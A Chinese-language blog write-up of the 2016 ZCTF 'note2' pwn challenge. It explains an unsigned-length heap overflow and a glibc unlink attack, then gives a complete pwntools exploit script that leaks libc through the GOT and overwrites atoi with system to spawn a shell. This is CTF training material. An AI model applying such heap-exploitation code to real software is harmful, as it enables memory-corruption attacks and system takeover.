2016 ZCTF note2--unlink

已于 2024-03-01 12:40:21 修改
阅读量403 收藏 10
点赞数 10
分类专栏: pwn 文章标签: python 开发语言
于 2024-02-29 22:42:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fuiifiuiii/article/details/136383132
版权

2016 ZCTF note2–unlink

很久没打unlink了,上一次打unlink还是将近一年前,如此怠惰

温习了一下重命名,重新指定类型啥的ida操作(重新指定类型没用上:{)

溢出点:

其中 i 是 unsigned 类型,lenth 为 int 类型,所以两者在 for 循环相比较的时候,lenth -1 的结果会被视为 unsigned 类型
在这里插入图片描述

输入0也可以符合这个判断

在这里插入图片描述

unlink需要伪造堆块,保证fd->bk == p == bk->fd,同时,要保证下一个块的prev_size与伪造的堆块大小相符。

主要是为了复健,就不多描述了。

长知识:chunk0伪造的块,中间有chunk1,释放chunk2,也可以与chunk0去合并。

从管理的index_of_chunk来看,1被free掉后重新创建占据了3的位置。

伪造堆块这两种都可以

payload1 = b"A"*8 + p64(0x61) + p64(fd) + p64(bk) + b"b"*0x40 +p64(0x60)
#payload1 = b'A'*8+ p64(0xa1) + p64(fd) +p64(bk)

第一个是自己手动填了后一个的pre_size是0x60

第二个直接算出来到chunk2的pre_size的长度。

delete之后number没有–,所以一直在往下占用index_of_chunk。

写的十分简略,只记录了我在复健的问题,详细可以参考ctfwiki

这个堆管理是一直往下加,如2被free掉后,这个位置就不会再有东西了。
于是好奇的回头看babyheap的管理方法,它会重复使用。

辛辛苦苦找到了管理的地方:
1.第一个,1表示有堆了,0表示没有
2.第二个,记录了当时创建时选择的大小,我这里填的20,所以显示了0x14
3.第三个,记录了指向数据域的指针。

在这里插入图片描述

exp:

from pwn import*
context(log_level='debug',arch='amd64',os='linux')
p=process('./note2')
#p=remote('node5.buuoj.cn',25695)
sl = lambda s :p.sendline(s)
sd = lambda s :p.send(s)
rc = lambda s :p.recv(s)
ru = lambda s :p.recvuntil(s)
rl = lambda   :p.recvline()

def debug():
    gdb.attach(p)
    pause(1)
index_of_chunk = 0x602120
fd = index_of_chunk - 0x18
bk = index_of_chunk - 0x10
atoi_got = 0x602088

sl(b"AA")
sl(b"BB")

def new(lenth,content):
    ru("option")
    sl(b'1')
    ru('Input the length of the note content:(less than 128)\n')
    sl(str(lenth))
    ru('content')
    sl(content)

def show(index):
    ru('option')
    sl(b"2")
    rl()
    sl(str(index))

def dele(index):
    ru('option')
    sl(b'4')
    rl()
    sl(str(index))

def edit(index,content):
    ru('option')
    sl(b'3')
    rl()
    sl(str(index))
    rl()
    sl(b'1')
    rl()
    sl(content)



#debug()
'''
#test of def
new(0x10,b"AAAAAAA")
edit(0,b'BBBB')
show(0)
dele(0)
'''
payload1 = b"A"*8 + p64(0x61) + p64(fd) + p64(bk) + b"b"*0x40 +p64(0x60)
#payload1 = b'A'*8+ p64(0xa1) + p64(fd) +p64(bk)
new(0x80,payload1)#0
new(0,b"AA")#1
new(0x80,b"AA")#2
#debug()
dele(1)
payload = b"A"*0x10 + p64(0xa0) + p64(0x90)
new(0,payload)
#debug()
dele(2)

edit(0,b"A"*(0x18)+p64(atoi_got)*4)
show(0)
#debug()
atoi_addr = u64(ru('\x7f')[-6:].ljust(8,b'\x00'))

#libc = ELF('/home/kali/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')
libc = ELF('/home/kali/Desktop/libc-2.23.so')

libc_base = atoi_addr - libc.sym['atoi']
print(hex(libc_base))

one_gadget = libc_base + 0xf02a4

system_addr = libc_base + libc.sym['system']
edit(0,p64(system_addr))
sl(b'/bin/sh')

p.interactive()
XYYR-c
关注
  • 10
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[BUUCTF]PWN——zctf2016_note2(unlink)
mcmuyanga的博客
02-07 799
zctf2016_note2 附件 步骤 例行检查,64位程序,开启了canary和nx 试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入,方便看程序,我修改了函数名 New_note() 定义的时候i是unsigned_int64,但是for循环里的i是int64.我们都知道,在c语言中,无符号变量和有符号变量比较时,会将有符号变量转化为无符号变量来比较。所以这里size为0的时候。(unsigned int)(size-1)就就是非常大的整数,存在整数溢出漏洞 show_not
2016_ZCTF_Pwn note2(unlink)
Pwnpanda的博客
08-05 583
暑假学习计划 - 0x03 2016_ZCTF_note2 详细分析参考:CTF Wiki 肝了一下午 + 一晚上,还是有一部分还不是很理解: ①为什么payload1后面一定要加上p64(64)+p64(0x60),为什么不能删除或者改大小; ②分配的三个堆块,为什么第一个和第三个大小一定是0x80; 路过的各位大佬,如果知道麻烦指点一些,谢谢啦 from pwn import...
【unlink】 zctf2016_note2
huzai9527的博客
04-19 225
【unlink】 zctf2016_note2 1.ida分析 堆溢出,unsigned int用于判断条件,导致的堆溢出 指针数组 2.思路 创建3个chunk,chunk0、chunk1、chunk2,通过chunk1连接chunk0,chunk2。构造unlink 在chunk0,构造fake chunk,free(chunk1)然后再申请修改chunk2的size,add(0,'b'*0x10 + p64(0xa0)+p64(0x90)) 释放chunk2,unlin
2016 ZCTF note2
Morphy_Amo的博客
01-27 2603
堆溢出中unlink的应用
CTF内存取证三项.7z
11-16
CTF取证分析赛题,对学习有很大帮助。
cv2读取和保存图片
最新发布
m0_53291740的博客
07-12 97
cv2.imwrite('b\\img1.png',img)#b存在就可以保存进去。如果b存在,c不存在,程序不会报错,也不会保存图片。如果目录b不存在就会存到当前文件夹。
面试题 21:解释 Python 中的 help() 函数和 dir() 函数?
专注于全栈开发领域
07-10 736
在Python中,help()和dir()是两个非常有用的内置函数,它们可以帮助开发者更好地了解Python对象和模块。
聊聊如何在内网下构建大模型微调环境
python1234567_的博客
07-12 628
LlamaFactory新版更新后,还是比较方便,只是说llamafactory-cli命令的确是有点蒙,踩个坑就好了。对于LlamaFactory微调来说,本身不难,毕竟都是配置;主要是在内网环境下的依赖包拉取安装是真麻烦,但其实也还好。走一遍的话,还是可以学到很多的。​。
基数排序算法Python实现
PeterClerk的博客
07-09 556
基数排序算法实现
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
小明的Java问道之路
07-08 2299
已解决 javax.xml.transform.TransformerFactoryConfigurationError 异常的正确解决方法,亲测有效!!!
java占位符替换五种方式
weixin_61478518的博客
07-08 535
在业务开发中,经常需要输出文本串。其中,部分场景下大部分文本内容是一样的,只有少部分点是不一样。简单做法是直接拼接字段,但是这会有个问题。后面如果想要修改内容,那么每个地方都要修改,这不符合设计模式中的开闭原则,面向应该对扩展开放,对修改关闭。如何解决这个问题?先来看现实生活中的例子,个人信息填写。一般会要填写表格,已经定义好了姓名,性别,年龄等字段,只要填写对应的个人信息就好了。在程序开发中,我们会预先定义好一个字符串模板,需要改动的点使用占位符。
守望数据边界:sklearn中的离群点检测技术
2401_85742452的博客
07-08 766
本文的目的是帮助读者更好地理解离群点检测,并掌握在sklearn中实现这些技术的方法。通过本文,我们了解到了sklearn中不同的离群点检测技术,并提供了实际的代码示例。Isolation Forest是一种基于随机森林的离群点检测方法,它通过随机选择特征和切分点来“孤立”离群点。在实际应用中,离群点检测可以帮助我们识别数据集中的异常行为,从而进行进一步的分析或采取预防措施。评估离群点检测的效果通常比较困难,因为没有绝对的标准。基于密度的方法,如DBSCAN,根据数据点的密度而非固定阈值来识别离群点。
编程学单词:delta(希腊字母Δ/δ),差值表示
m0_57158496的博客
07-11 1000
结语:代码编写中,用“通用”字符命名相应变量,是一个不错的好习惯。其一,不用注释,望文生义,简单明了;其二,代码书写形式风格“标准”统一,方便维护和流转。说明:今天我在堆叠代码时发现有delta样子的单词存在,修习之,对代码书写大有裨益。从今以后,我遇到类似的单词,都将在学习笔记中标识、分享。😋回页目录。
华为910b推理Qwen1.5-72b
weixin_41549308的博客
07-12 528
910b部署推理大模型
字体反爬之自动化通过字体文件生成映射字典
程序烂人的博客
07-12 607
sont.ttf下载地址https://download.csdn.net/download/lingyingdon/89534953官网地址如下python脚本如下 通过执行以下命令脚本分割字体文件(前提是将fontforge添加到环境变量)处理后的图片如下 经过处理后的图片如下 5、最后来看一下运行结果,全自动执行,不需要在一个一个整理字体字典了(我这里在代码中用&#x对uni进行了替换)
查找浮点数的交点
weixin_44617651的博客
07-09 466
在一个项目中,我们需要计算两个函数 f(x) 和 g(x) 在 x 的值从 0 到 1000 之间的交点。为了找到交点,我们需要不断地运行这两个函数,并比较它们的结果。当 f(x) 等于 g(x) 时,我们找到了交点并停止循环。
Pycharm下载、安装及配置
Frost_Descent的博客
07-12 301
Pycharm:适用于数据科学和 Web 开发的 Python IDE。
基于LLaMA-Factory的微调记录
Climbman的博客
07-09 504
由于不需要考虑多轮对话,所以history可以不要,这里采用了两种数据集的组织方式,一种是只有instruction和output,把问题作为instruction,另外一种是把问题作为input,把回答问题这一要求作为instruction。微调时一般需要准备三个数据集:一个是自我认知数据集(让大模型知道自己是谁),一个是特定任务数据集(微调时需要完成的目标任务),一个是通用任务数据集(保持大模型的通用能力,防止变傻)。测试的大模型可以使用这些,注意要下载最新版,老版的模型结构不太匹配。
使用pycuda + skcuda 遇到 OSError: CUDA runtime library not found 的解决方案
天之彼方的博客
07-09 381
使用pycuda + skcuda 遇到 OSError: CUDA runtime library not found 的解决方案

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值